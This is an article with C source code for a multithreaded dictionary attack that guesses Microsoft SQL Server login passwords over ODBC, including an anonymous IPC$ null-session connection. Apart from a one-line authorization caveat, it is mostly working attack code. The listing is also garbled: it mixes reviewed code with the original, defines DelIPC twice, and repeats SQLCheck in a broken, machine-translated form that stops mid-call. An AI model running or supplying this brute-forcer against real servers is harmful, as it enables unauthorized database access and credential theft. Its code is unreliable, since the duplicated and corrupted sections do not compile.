This article shows how to guess the password of a Microsoft SQL Server login by trying every word of a dictionary file against the server (an online dictionary attack). The example below walks through the whole process. Run it only against servers you are authorized to test: each attempt is a failed login that the server can log and alert on.
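// Header file used by the program
// (the #include lines are not shown on this page; the calls below need the Windows
//  networking, ODBC and C runtime headers — confirm against the original source)

// Global state shared by ReadDic, the SQLCheck worker threads and main().
// NOTE(review): SQLCheck is a thread procedure that writes Cracked and passwd while
// main presumably reads them; nothing here synchronizes that access. Guard them
// (Interlocked* or a critical section) before relying on the values.
enum {
    MAX_WORDS = 20000,  // dictionary entries held in memory
    WORD_LEN  = 40      // bytes per entry, including the terminating NUL
};

char dict[MAX_WORDS][WORD_LEN];  // candidate passwords loaded from the dictionary file
char UserName[WORD_LEN];         // SQL login being tested
char target[WORD_LEN];           // server the ODBC connection string points at
char passwd[WORD_LEN];           // the candidate that was accepted, once one is found
int  total = 0;                  // number of entries actually loaded into dict
BOOL Cracked = FALSE;            // TRUE once a candidate password logged in successfully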
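//
// Function: usage
// Purpose: print the banner and the command-line syntax to stdout.
//
void usage(void)
{
    // One literal with no format arguments, so nothing in it can be parsed as a
    // conversion; the backslash in the example path is escaped so the compiler does
    // not read it as the (undefined) escape sequence "\p".
    fputs("\nPower by analyzer <inmiao@163.com>"
          "\nhttp://www.infocn.com"
          "\nUsage: SQLCrack <ip> <UserName> <dict> <SleepTime[20-1000]>"
          "\nExample: SQLCrack 192.168.0.1 sa c:\\pwd.dic 50\n",
          stdout);
}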
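//
// Function: ReadDic
// Purpose: load candidate passwords, one per line, from the dictionary file `dic`
//          into the global dict array, appending after the `total` entries already
//          present and advancing `total` for each line loaded.
// Returns: 0 on success, 1 if the file could not be opened.
// Notes: each line is read into a buffer of sizeof dict[0] bytes, so a longer line is
//        split across several entries (as in the original design). A trailing "\n"
//        or "\r\n" is stripped; an empty line becomes an empty candidate (blank
//        password). Loading stops when dict is full.
//
int ReadDic(char *dic)
{
    FILE *fp = fopen(dic, "r");
    if (fp == NULL) {
        printf("\nCan't open %s", dic);
        return 1;
    }

    const int max_words = (int)(sizeof dict / sizeof dict[0]);
    char line[sizeof dict[0]];

    while (total < max_words && fgets(line, (int)sizeof line, fp) != NULL) {
        // Cut at the first CR/LF. The original copied strlen-1 bytes, which chopped
        // the last character of a final line that has no newline and, for an empty
        // read, turned the length into (size_t)-1.
        line[strcspn(line, "\r\n")] = '\0';
        // Bounded copy that always NUL-terminates the entry.
        snprintf(dict[total], sizeof dict[0], "%s", line);
        total++;
    }

    fclose(fp);
    return 0;
}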
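//
// Function: ConnIPC
// Purpose: open an IPC$ connection to RemoteName (expected in "\\host" form) with an
//          empty user name and password, i.e. an anonymous (null-session) logon.
//          Presumably this lets the later SQL connection ride on the SMB session —
//          NOTE(review): confirm; a TCP/IP ODBC connection does not need it.
// Parameter: RemoteName - server name to connect to.
// Returns: 0 on success, 1 if the name does not fit or WNetAddConnection2 failed.
// Assumes an ANSI (non-UNICODE) build, as the original's strcat on TCHAR did.
//
int ConnIPC(char *RemoteName)
{
    NETRESOURCE nr;
    char rn[30];
    char ln[5] = "";
    int n;

    // Bounded build of "<RemoteName>\ipc$"; the original strcat pair overflowed rn
    // for any RemoteName longer than 24 characters.
    n = snprintf(rn, sizeof rn, "%s\\ipc$", RemoteName);
    if (n < 0 || (size_t)n >= sizeof rn) {
        return 1;
    }

    // Zero every field so the members this call does not use hold no stack garbage.
    memset(&nr, 0, sizeof nr);
    nr.dwType = RESOURCETYPE_DISK;
    nr.lpLocalName = (LPTSTR)ln;   // empty string: no local device is redirected
    nr.lpRemoteName = (LPTSTR)rn;
    nr.lpProvider = NULL;

    // CONNECT_UPDATE_PROFILE makes the connection persistent across logons on the
    // local machine (kept from the original; 0 would avoid leaving that residue).
    if (WNetAddConnection2(&nr, (LPSTR)"", (LPSTR)"", CONNECT_UPDATE_PROFILE) == NO_ERROR) {
        return 0;
    }
    return 1;
}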
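//
// Function: DelIPC
// Purpose: tear down the IPC$ connection that ConnIPC opened to RemoteName.
// Parameter: RemoteName - the same server name that was passed to ConnIPC.
// Returns: 0 on success, 1 if the name does not fit or WNetCancelConnection2 failed.
// Assumes an ANSI (non-UNICODE) build, as the original's strcat on TCHAR did.
//
int DelIPC(char *RemoteName)
{
    char lpName[30];
    int n;

    // Bounded build of "<RemoteName>\ipc$"; the original strcat pair overflowed
    // lpName for any RemoteName longer than 24 characters.
    n = snprintf(lpName, sizeof lpName, "%s\\ipc$", RemoteName);
    if (n < 0 || (size_t)n >= sizeof lpName) {
        return 1;
    }

    // TRUE forces the disconnect even if files are open on the connection.
    if (WNetCancelConnection2((LPTSTR)lpName, CONNECT_UPDATE_PROFILE, TRUE) == NO_ERROR) {
        return 0;
    }
    return 1;
}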
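//
// Function: SQLCheck
// Purpose: thread procedure. Attempts one ODBC login to `target` as `UserName` with
//          the candidate password that pPwd points at. If the login is accepted,
//          sets the global Cracked to TRUE and copies the candidate into passwd.
// Parameter: pPwd - pointer to a NUL-terminated candidate password (one dict entry).
// Returns: always 0; the thread exit code does not carry the result.
// Notes: several instances may run concurrently. Cracked and passwd are written
//        without synchronization (unchanged here) — NOTE(review): guard them if more
//        than one thread can succeed, or the copy into passwd can interleave.
//
DWORD WINAPI SQLCheck(PVOID pPwd)
{
    char szBuffer[1025];
    SQLCHAR ConnStr[200];
    SWORD swStrLen;
    SQLHANDLE henv;
    SQLHDBC hdbc;
    SQLRETURN retcode;
    const char *pwd = (const char *)pPwd;
    int n;

    // Build the connection string with one bounded write instead of strcpy/strcat.
    // PWD is wrapped in braces so a candidate containing ';' or '=' is taken as the
    // password value instead of being parsed as further keywords (a candidate that
    // itself contains '}' still cannot be expressed this way).
    n = snprintf((char *)ConnStr, sizeof ConnStr,
                 "DRIVER={SQL Server};SERVER=%s;UID=%s;PWD={%s};DATABASE=master",
                 target, UserName, pwd);
    if (n < 0 || (size_t)n >= sizeof ConnStr) {
        printf("\nConnection string too long.\n");
        return 0;
    }

    if (SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &henv) != SQL_SUCCESS) {
        printf("\nAllocate environment handle failed.\n");
        return 0;
    }

    if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER)SQL_OV_ODBC3,
                      SQL_IS_INTEGER) != SQL_SUCCESS) {
        printf("\nSet the ODBC version environment attribute failed.\n");
        SQLFreeHandle(SQL_HANDLE_ENV, henv);
        return 0;
    }

    if (SQLAllocHandle(SQL_HANDLE_DBC, henv, &hdbc) != SQL_SUCCESS) {
        printf("\nAllocate connection handle failed.\n");
        SQLFreeHandle(SQL_HANDLE_ENV, henv);
        return 0;
    }

    // There is no window handle in a worker thread, so the driver must never prompt
    // for missing attributes; SQL_DRIVER_NOPROMPT states that explicitly (with a NULL
    // hwnd the original's SQL_DRIVER_COMPLETE_REQUIRED could not prompt either).
    retcode = SQLDriverConnect(hdbc, NULL, ConnStr, (SQLSMALLINT)n,
                               (SQLCHAR *)szBuffer, (SQLSMALLINT)sizeof szBuffer,
                               &swStrLen, SQL_DRIVER_NOPROMPT);

    if (retcode == SQL_SUCCESS || retcode == SQL_SUCCESS_WITH_INFO) {
        // The credentials were accepted (SUCCESS_WITH_INFO still means a connection
        // was established). Publish the result and drop the session at once.
        Cracked = TRUE;
        snprintf(passwd, sizeof passwd, "%s", pwd);
        SQLDisconnect(hdbc);
    }

    // Release handles on every path; a failed connect is the normal case here and
    // is reported only through Cracked staying FALSE.
    SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
    SQLFreeHandle(SQL_HANDLE_ENV, henv);
    return 0;
}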
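//
// Function: DelIPC
// Purpose: tear down the IPC$ connection that ConnIPC opened to RemoteName.
// Parameter: RemoteName - the same server name that was passed to ConnIPC.
// Returns: 0 on success, 1 if the name does not fit or WNetCancelConnection2 failed.
// NOTE(review): this is a second definition of DelIPC; the same function is already
//               defined earlier in this listing. Two definitions will not build —
//               keep one copy.
// Assumes an ANSI (non-UNICODE) build, as the original's strcat on TCHAR did.
//
int DelIPC(char *RemoteName)
{
    char lpName[30];
    int n;

    // Bounded build of "<RemoteName>\ipc$"; the original strcat pair overflowed
    // lpName for any RemoteName longer than 24 characters.
    n = snprintf(lpName, sizeof lpName, "%s\\ipc$", RemoteName);
    if (n < 0 || (size_t)n >= sizeof lpName) {
        return 1;
    }

    // TRUE forces the disconnect even if files are open on the connection.
    if (WNetCancelConnection2((LPTSTR)lpName, CONNECT_UPDATE_PROFILE, TRUE) == NO_ERROR) {
        return 0;
    }
    return 1;
}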
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
Dword winapi SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value
SCHAR ConnStr [200]; // connection string
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS ){
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr ),
SzBuffer, sizeof (szBuffer ),&